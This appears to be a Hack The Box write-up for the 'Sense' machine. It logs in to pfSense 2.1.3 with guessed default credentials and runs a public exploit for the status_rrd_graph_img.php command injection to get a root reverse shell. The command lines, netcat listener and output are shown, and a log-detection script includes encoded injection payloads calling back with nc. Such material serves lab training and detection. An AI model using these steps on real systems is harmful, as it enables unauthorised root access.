Contents

🕵 HTB-Writeup : SENSE

Recon

nmap

└─$ nmap -timing 5 -Pn -p- 10.10.10.60

PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Try the documented pfSense default credentials on the login page (https://10.10.10.60/index.php):

  • admin:pfsense
  • root:pfsense

Neither works.

dirbuster

Result of the dirbuster scan (screenshot)

The scan turns up a changelog at https://10[.]10[.]10[.]60/changelog.txt that leaks information about three vulnerabilities on the system, only two of which have been patched.

# Security Changelog 

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window

Visiting https://10[.]10[.]10[.]60/system-users.txt we find a support ticket requesting the creation of a user.

####Support ticket###

Please create the following user

username: Rohit
password: company defaults

This gives us a first username, Rohit, whose password is the "company default". Since the box runs pfSense, the obvious guess is the pfSense default password: let's try logging in as rohit:pfsense.


We are logged in to the dashboard!

Vulnerabilities

Once on the dashboard we can see that pfSense 2.1.3 is installed. A searchsploit query for that version turns up a Python exploit.

└─$ searchsploit pfsense 2.1  
----------------------------------------------------------------|---------------------------------
 Exploit Title                                                  |  Path
----------------------------------------------------------------|---------------------------------
pfSense 2.1 build 20130911-1816 - Directory Traversal           | php/webapps/31263.txt
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection  | php/webapps/43560.py
----------------------------------------------------------------|---------------------------------

The script exploits CVE-2014-4688, a command injection in status_rrd_graph_img.php (https://10[.]10[.]10[.]60/status_rrd_graph_img.php): the `database` parameter is handed to rrdtool through a shell without sanitization, so any authenticated user, privileged or not, can inject arbitrary operating system commands. Because the pfSense webConfigurator runs as root, the injected commands execute as root, and no separate privilege escalation is needed.
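From the defender's side, the same weakness is easy to spot in the web server logs: a legitimate `database` value is an RRD file name, so anything carrying shell metacharacters in that parameter is an attack attempt. The following is an added example (not code from the writeup or from pfSense) that parses constructed lighttpd-style access-log lines and flags hostile `database` values, decoding percent-encoding repeatedly so double-encoded payloads are not missed. The allowlist character class and the sample log lines are assumptions for illustration; the real 2.1.4 fix validates the parameter against the RRD files actually present on disk.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed lighttpd-style access-log lines (sample data, not taken from the box).
SAMPLE_LOG = """\
10.10.14.5 10.10.10.60 - [12/Oct/2023:10:00:01 +0000] "GET /status_rrd_graph_img.php?database=queues&graph=queues HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
10.10.14.5 10.10.10.60 - [12/Oct/2023:10:00:07 +0000] "GET /status_rrd_graph_img.php?database=queues%3Bid%7Cnc+10.10.14.5+4444 HTTP/1.1" 200 0 "-" "python-requests/2.31"
10.10.14.5 10.10.10.60 - [12/Oct/2023:10:00:09 +0000] "GET /status_rrd_graph_img.php?database=wan-traffic.rrd&graph=traffic HTTP/1.1" 200 3987 "-" "Mozilla/5.0"
10.10.14.5 10.10.10.60 - [12/Oct/2023:10:00:11 +0000] "GET /status_rrd_graph_img.php?database=%60sh+-c+%27whoami%27%60 HTTP/1.1" 500 0 "-" "curl/8.0"
10.10.14.5 10.10.10.60 - [12/Oct/2023:10:00:15 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# lighttpd default accesslog layout: host vhost user [time] "request" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed allowlist for the `database` parameter: RRD file names such as
# "wan-traffic.rrd" or "queues". A strict character class is a stand-in for
# checking against the real files under /var/db/rrd, which is what the fix does.
SAFE_DB_RE = re.compile(r'^[A-Za-z0-9_.-]+$')
SHELL_META = set(';|&`$()<>\n')


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%253B -> %3B -> ;) are caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_database_value(value):
    """Return None for a benign value, otherwise a short reason string."""
    decoded = decode_fully(value)
    if any(ch in SHELL_META for ch in decoded):
        return "shell-metacharacter"
    if not SAFE_DB_RE.match(decoded):
        return "outside-allowlist"
    return None


def suspicious_database_values(log_text):
    """Scan access-log text for status_rrd_graph_img.php hits carrying a hostile `database` value."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/status_rrd_graph_img.php":
            continue
        # parse_qs already percent-decodes once and turns '+' into a space
        for raw in parse_qs(parts.query, keep_blank_values=True).get("database", []):
            reason = classify_database_value(raw)
            if reason:
                findings.append({
                    "client": m.group("client"),
                    "time": m.group("time"),
                    "status": int(m.group("status")),
                    "decoded": decode_fully(raw),
                    "reason": reason,
                })
    return findings


if __name__ == "__main__":
    for f in suspicious_database_values(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} -> {f['reason']}: {f['decoded']!r}")
```

Run against the constructed sample, the two injection attempts are reported and the benign graph requests are not. Note that the status code is not a useful signal on its own: the first injection returns 200 because rrdtool still ran, so the detection has to look at the parameter value, not at the response.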

We pass the target, our listener address and port, and the rohit:pfsense credentials to the script and run it. Start the netcat listener before launching the exploit so the reverse shell has somewhere to connect back to.

└─$ python3 /usr/share/exploitdb/exploits/php/webapps/43560.py --rhost 10.10.10.60 --lhost <myIP> --lport 4444 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed

└─$ nc -lvnp 4444                        
listening on [any] 4444 ...
connect to [myIP] from (UNKNOWN) [10.10.10.60] 1391
sh: can't access tty; job control turned off
# whoami
root

We get a root reverse shell straight away, with no privilege escalation step, and can grab both flags :)

Tags

FreeBSD, Easy, External, LightHTTPD, PHP, Penetration Tester Level 1, Remote Code Execution, A06:2021-Vulnerable And Outdated Components, Public Vulnerabilities, Pfsense